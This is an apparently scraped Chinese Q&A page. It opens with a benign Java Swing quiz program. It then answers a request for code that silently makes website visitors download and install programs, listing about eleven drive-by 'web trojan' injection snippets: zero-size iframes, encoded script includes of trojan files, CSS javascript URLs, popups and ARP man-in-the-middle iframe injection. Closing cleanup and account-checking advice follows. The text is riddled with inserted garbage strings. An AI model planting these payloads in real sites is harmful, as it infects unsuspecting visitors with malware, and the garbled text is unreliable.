scro編程

1. java圖形用戶界面程序設計作業

import java.awt.event.ActionEvent;
import java.awt.event.ActionListener;
import java.io.BufferedReader;
import java.io.FileNotFoundException;
import java.io.FileReader;
import java.io.IOException;
import java.util.ArrayList;

import javax.swing.ButtonGroup;
import javax.swing.JButton;
import javax.swing.JFrame;
import javax.swing.JLabel;
import javax.swing.JOptionPane;
import javax.swing.JPanel;
import javax.swing.JRadioButton;
import javax.swing.JScrollPane;
import javax.swing.JTextArea;

public class Test extends JFrame implements ActionListener {

private static final long serialVersionUID = 1L;
private ButtonGroup buttonGroup = new ButtonGroup();
private JPanel pnlUp;
private JPanel pnlDown;
private JLabel lblSub;
private JLabel lblChoose;
private JRadioButton rbtn1;
private JRadioButton rbtn2;
private JRadioButton rbtn3;
private JRadioButton rbtn4;
private JButton btnRes;
private JButton btnNext;
private JTextArea txtArea;
private JScrollPane scrollPane;

private ArrayList<String> list;
private BufferedReader buf;

private String answer;
private int line;
private int scro;

public void init() {
getContentPane().setLayout(null);
setResizable(false);
setTitle("Test");
setBounds(100, 100, 500, 375);
setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);

pnlUp = new JPanel();
pnlUp.setLayout(null);
pnlUp.setBounds(0, 0, 494, 21);
getContentPane().add(pnlUp);

lblSub = new JLabel();
lblSub.setText("Subject :");
lblSub.setBounds(80, 0, 86, 21);
pnlUp.add(lblSub);

pnlDown = new JPanel();
pnlDown.setLayout(null);
pnlDown.setBounds(0, 260, 494, 83);
getContentPane().add(pnlDown);

lblChoose = new JLabel();
lblChoose.setText("Choose :");
lblChoose.setBounds(26, 10, 56, 16);
pnlDown.add(lblChoose);

rbtn1 = new JRadioButton();
buttonGroup.add(rbtn1);
rbtn1.setText("");
rbtn1.setBounds(88, 6, 102, 24);
rbtn1.addActionListener(this);
pnlDown.add(rbtn1);

rbtn2 = new JRadioButton();
buttonGroup.add(rbtn2);
rbtn2.setText("");
rbtn2.setBounds(223, 6, 102, 24);
rbtn2.addActionListener(this);
pnlDown.add(rbtn2);

rbtn3 = new JRadioButton();
buttonGroup.add(rbtn3);
rbtn3.setText("");
rbtn3.setBounds(88, 36, 102, 24);
rbtn3.addActionListener(this);
pnlDown.add(rbtn3);

rbtn4 = new JRadioButton();
buttonGroup.add(rbtn4);
rbtn4.setText("");
rbtn4.setBounds(223, 36, 102, 24);
rbtn4.addActionListener(this);
pnlDown.add(rbtn4);

btnRes = new JButton();
btnRes.setText("Restart");
btnRes.setBounds(354, 10, 106, 26);
btnRes.addActionListener(this);
pnlDown.add(btnRes);

btnNext = new JButton();
btnNext.setText("Next");
btnNext.setBounds(354, 47, 106, 26);
btnNext.addActionListener(this);
pnlDown.add(btnNext);

scrollPane = new JScrollPane();
scrollPane.setBounds(0, 21, 494, 239);
getContentPane().add(scrollPane);

txtArea = new JTextArea();
txtArea.setEditable(false);
scrollPane.setViewportView(txtArea);

readTxt("test.txt");
setName(0);
setVisible(true);
}

public void readTxt(String path) {
String read = "";
list = new ArrayList<String>();
try {
buf = new BufferedReader(new FileReader(path));
while ((read = buf.readLine()) != null) {
if (read.equals("endend")) {
break;
}
list.add(read);
}

} catch (FileNotFoundException e) {
e.printStackTrace();
} catch (IOException e) {
e.printStackTrace();
}
}

public void setName(int line) {
String[] str = list.get(line).split("#");
txtArea.setText(str[1]);
rbtn1.setText(str[2]);
rbtn2.setText(str[3]);
rbtn3.setText(str[4]);
rbtn4.setText(str[5]);
answer = str[6];
}

public void actionPerformed(ActionEvent e) {
if (e.getSource() == btnNext) {
rbtn1.setEnabled(true);
rbtn2.setEnabled(true);
rbtn3.setEnabled(true);
rbtn4.setEnabled(true);
line = line + 1;
if (line >= list.size()) {
JOptionPane
.showMessageDialog(null, "End! Your Scro is " + scro);
rbtn1.setEnabled(false);
rbtn2.setEnabled(false);
rbtn3.setEnabled(false);
rbtn4.setEnabled(false);
} else {
setName(line);
rbtn1.setSelected(true);
}
}
if (e.getSource() == btnRes) {
rbtn1.setEnabled(true);
rbtn2.setEnabled(true);
rbtn3.setEnabled(true);
rbtn4.setEnabled(true);
rbtn1.setSelected(true);
scro = 0;
line = 0;
setName(line);
}
if (e.getSource() == rbtn1) {
if (rbtn1.getText().equals(answer)) {
scro = scro + 10;
}
rbtn1.setEnabled(false);
rbtn2.setEnabled(false);
rbtn3.setEnabled(false);
rbtn4.setEnabled(false);
}
if (e.getSource() == rbtn2) {
if (rbtn2.getText().equals(answer)) {
scro = scro + 10;
}
rbtn1.setEnabled(false);
rbtn2.setEnabled(false);
rbtn3.setEnabled(false);
rbtn4.setEnabled(false);
}
if (e.getSource() == rbtn3) {
if (rbtn3.getText().equals(answer)) {
scro = scro + 10;
}
rbtn1.setEnabled(false);
rbtn2.setEnabled(false);
rbtn3.setEnabled(false);
rbtn4.setEnabled(false);
}
if (e.getSource() == rbtn4) {
if (rbtn4.getText().equals(answer)) {
scro = scro + 10;
}
rbtn1.setEnabled(false);
rbtn2.setEnabled(false);
rbtn3.setEnabled(false);
rbtn4.setEnabled(false);
}
}

public static void main(String args[]) {
Test test = new Test();
test.init();
}
}
//寫得好累，要求追加分~~不懂網路HI我~

2. 在網頁是讓訪問網頁的人自動下載並且自動安裝的代碼

一:框架掛馬浪漫之家社區門戶.}8d{ocb

;Z}x
?\` sT-e0 <iframe src=地址 width=0 height=0></iframe>浪漫之家社區門戶*f2iNFvtV$V

]-iXpQG+v$\0二:js文件掛馬浪漫之家社區門戶2D(D
_3QU1a YS

T,UEsy(~ Q!i"K0 首先將以下代碼浪漫之家社區門戶XvK&DSs_ n
document.write("<iframe width='0' height='0' src='地址'></iframe>");浪漫之家社區門戶7v1rWpv4E`
保存為xxx.js，
0];Q.E?N A0 則JS掛馬代碼為
xt].y4QfX0 <script language=javascript src=xxx.js></script>
(~+}Cy:R9ss0浪漫之家社區門戶(rJ(E^5Z b|+p
三:js變形加密浪漫之家社區門戶w4{7v
~ Cj
浪漫之家社區門戶gAub7\5Us
<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>浪漫之家社區門戶'IQWSv
muma.txt可改成任意後綴浪漫之家社區門戶 aJ5~7sX]
四:body掛馬浪漫之家社區門戶LV3X"HVc?#[

7y0k9P;Z&hn0 <body ></body>
0u yo.{\Za0浪漫之家社區門戶;M2cA Xo,[\,m
五:隱蔽掛馬
P2@vj2\m}.L
Bf0浪漫之家社區門戶bF9^c A;i[6\;l k`
top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src="http://www.linglihu.com/"></iframe>';浪漫之家社區門戶o1}"uC)u
浪漫之家社區門戶'_g+N#` x'@$x
六:css中掛馬浪漫之家社區門戶^1c9|5T+E3A l `0R

.P:ZGz3qy`0 body {浪漫之家社區門戶*]&N5b+S2d!k v!p%o
background-image: url('javascript:document.write("<script src=http://www.XXX.net/muma.js></script>")')}浪漫之家社區門戶9@ T{-jBQk:c*k i

8@mpE3Y-E+[o0七:JAJA掛馬
^O7hzN0
El*V z{4Wz3lGs,?,D0 <SCRIPT language=javascript>
LX@2t B5j4xRL.~0 window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1"); 浪漫之家社區門戶RoN {z]&J{A$}b[
</script>浪漫之家社區門戶L0} N.Ii2x`P*GT+@
浪漫之家社區門戶 A0h2l%|ekT
八:圖片偽裝
1x(lu.\1NE'p:sY0浪漫之家社區門戶TfZ4L:VR_ U
<html>浪漫之家社區門戶b8X%K"A
Z?;WAZ$y
<iframe src="網馬地址" height=0 width=0></iframe>
g^M2c8Iqj/S0g0 <img src="圖片地址"></center>浪漫之家社區門戶#D5H!L Au cgU
</html>浪漫之家社區門戶I8@J(j$h
fI b

4p'kxc!jyhLtL0九:偽裝調用：浪漫之家社區門戶3n [?5j8HlA|
浪漫之家社區門戶Pno.ND
<frameset rows="444,0" cols="*">浪漫之家社區門戶2|6jm6W+C*h
<frame src="打開網頁" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
Jg({%E!v,~1v VN0 <frame src="網馬地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">

E!|n#AQ'H/J F0 </frameset>浪漫之家社區門戶*r;B?D"wLE-zI n
浪漫之家社區門戶4O&Cpi/W6gNM%rU
十:高級欺騙
`8A${,qi0
j w3dMu'}9Z0 <a href="http://www.linglihu.com(迷惑連接地址，顯示這個地址指向木馬地址)" > 頁面要顯示的內容 </a>
_`!xA,B3e zt6T;C0<SCRIPT Language="JavaScript">浪漫之家社區門戶L%w~StQ-@5]S
function www_163_com ()浪漫之家社區門戶O U7\%d Z7x
{浪漫之家社區門戶%l4y"C)R&j-Re1g
var url="網馬地址";
[};t0A&G0open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,history=yes,width=800,height=600,left=10,top=10");浪漫之家社區門戶 Wh!j+Hm;`c
}浪漫之家社區門戶)r5g#Sj7SB4^_
</SCRIPT>
:y&N~-a!^$?dd6E0浪漫之家社區門戶u~E6KQD
十一: 超級網馬—通過arp欺騙來直接掛馬
:mhZ2F3r3r-z$s2O0
"YO8C^i$rl/].o0原理：arp中間人攻擊，實際上相當於做了一次代理。浪漫之家社區門戶
]%DpqmFV?C8E7_F
浪漫之家社區門戶:|3_j$@&aw.]?t
正常時候: A---->B ,A是訪問的正常客戶,B是要攻擊的伺服器,C是被我們控制的主機
7LI KTs0arp中間人攻擊時候: A---->C---->B
g
h|$[b N0B---->C---->A
iIqcO8v0實際上,C在這里做了一次代理的作用浪漫之家社區門戶9lxbjEE9_3Xr r L
浪漫之家社區門戶R.{*kT9Ui
那麼HTTP請求發過來的時候,C判斷下是哪個客戶端發過來的包,轉發給B,然後B返回HTTP響應的時候,在HTTP響應包中,插入一段掛馬的代碼,比如<iframe>...之類,再將修改過的包返回的正常的客戶A,就起到了一個掛馬的作用.在這個過程中,B是沒有任何感覺的,直接攻擊的是正常的客戶A,如果A是管理員或者是目標單位,就直接掛上馬了。
8cd1bA j+v}0
p6j4xgv0如何處理網頁木馬：
.r:ej y}izC#i01、找到嵌入的網頁木馬文件。以下，拿自己的經歷說事。找到的文件是wm.htm
#c [:[}.caA ?4s)ax0浪漫之家社區門戶C%qQ7Xd M-i8T,\ q
2、在注冊表中查找wm.htm。很幸運，找到了。開始順藤摸瓜...浪漫之家社區門戶)qJXkHY)I
浪漫之家社區門戶*@ L uIi
3、修改鍵值wm.htm為wm_nnd.htm。
/bX0e5I-`0浪漫之家社區門戶R+jyC)wk8Kl,y
4、再次查找wm.htm。很不幸，又查到了。說明有服務程序在作怪。嘿嘿，有意外發現。浪漫之家社區門戶bQ[7~,\2P
cain.exe，據說是密碼嗅探器。浪漫之家社區門戶
gG.px xa_C

8m9e"z5^!q)[8By8iY;BA05、修改鍵值cain.exe為cain_nnd.exe。
`m+b3@ @-H0浪漫之家社區門戶ax;U+p1n(J
6、查找cain.exe，仍然可以查到。嘻嘻，在預料之中。
M*UQ:\7Rc`B0浪漫之家社區門戶U(F0Nu9W
7、懷疑wm.htm與cain.exe同流合污，背後有服務程序作後台。浪漫之家社區門戶
}zj4x V2G
浪漫之家社區門戶V;q0l:@Sri
8、快查查看，系統服務程序。在運行->msconfig 或直接在命令行使用net start，查看可疑程序
vI4f J)L o)D0
'i G*E W*^a09、發現temp*.exe（全名記不清了），立馬net stop server 。浪漫之家社區門戶;F
{%\B7r a9eY

'W2IH9bP2MI:Oxkk010、快去修改鍵值wm.htm為wm_nnd.htm，cain.exe為cain_nnd.exe。
0jW r7O C0
(j}y,w6G+Z011、再次查找wm.htm或cain.exe,沒有找到。哈哈，很好。
Q(|%h,}t0
5VO\m
W@;y.N;n012、觀察了幾天，沒再發生掛馬的現象。 另外，通過檢測網路連接查看伺服器是否中了木馬或病毒浪漫之家社區門戶3\O] @
n{r
浪漫之家社區門戶I$@K9QN&S${/U
1、使用netstat -an 查看所有和本地計算機建立連接的IP。
.gB1n dL(|H}0
(B.Qv1v%?2k+G X02、連接包含四個部分——proto(連接方式)、local address(本地連接地址)、foreign address(和本地建立連接的地址)、state(當前埠狀態)。 通過這個命令的詳細信息，可以完全監控計算機上的連接，從而達到控制計算機的目的。
7J;rK5WE0浪漫之家社區門戶"i \$J\ KI
3、手工製作bat程序，生成網路連接日誌文件供站長分析：bat文件代碼如下
1BKY-~#Bx8u@J#G0浪漫之家社區門戶2@wQY5M
REM 注釋：監控的時間
;|)RUz!A;X@0time /t>>Netstat.log浪漫之家社區門戶L:vR9ZSum
REM 每隔30秒，把伺服器上通過tcp協議通訊的IP和埠寫入日誌文件浪漫之家社區門戶8| F {.f,p*H5f a]
Netstat -n -p tcp 30>>Netstat.log浪漫之家社區門戶9LUgLM(X[%v

dA_"C_`!J+{0注意：要謹慎使用，這會給伺服器帶來性能影響。最好，在伺服器發生異常，懷疑中木馬或病毒時，用來分析網路連接日誌。浪漫之家社區門戶y Bs}mZ\
浪漫之家社區門戶e&f$J!@#k
僅僅這些還不夠，說說更嚴重的：浪漫之家社區門戶 nw!C~/@.k {bc_

6UM T%`3HQs8`m r01、可惡的攻擊者喜歡使用克隆賬號的方法來控制你的計算機。「它們」激活一個系統中的默認賬戶，但這個賬戶是不經常用的， 然後使用工具把這個賬戶提升到管理員許可權，從表面上看來這個賬戶還是和原來一樣，但是這個克隆的賬戶卻是系統中最大的安全隱患。浪漫之家社區門戶i{${1}v1hd+r$E"ix
浪漫之家社區門戶 j8o0~|`:~^"B&G
2、趕快檢測系統帳戶：
X!u'w Q7^*cJ(o&OH0a、在命令行下輸入net user，查看計算機上有些什麼用戶。浪漫之家社區門戶] t G.^ @T
b、使用「net user 用戶名」查看這個用戶屬於什麼許可權的及登錄時間等。
9b)~~&x0?"l,Gru0c、一般除了Administrator是administrators組的，如果你發現一個系統內置的用戶是屬於administrators組的，
E T/u/d%i#B1{u0 那麼別人在你的計算機上克隆賬戶的概率為90%。浪漫之家社區門戶*w}+g9B0\
d、是使用「net user 用戶名 /del」 來刪掉這個用戶，還是修改其它配置，這你說了算。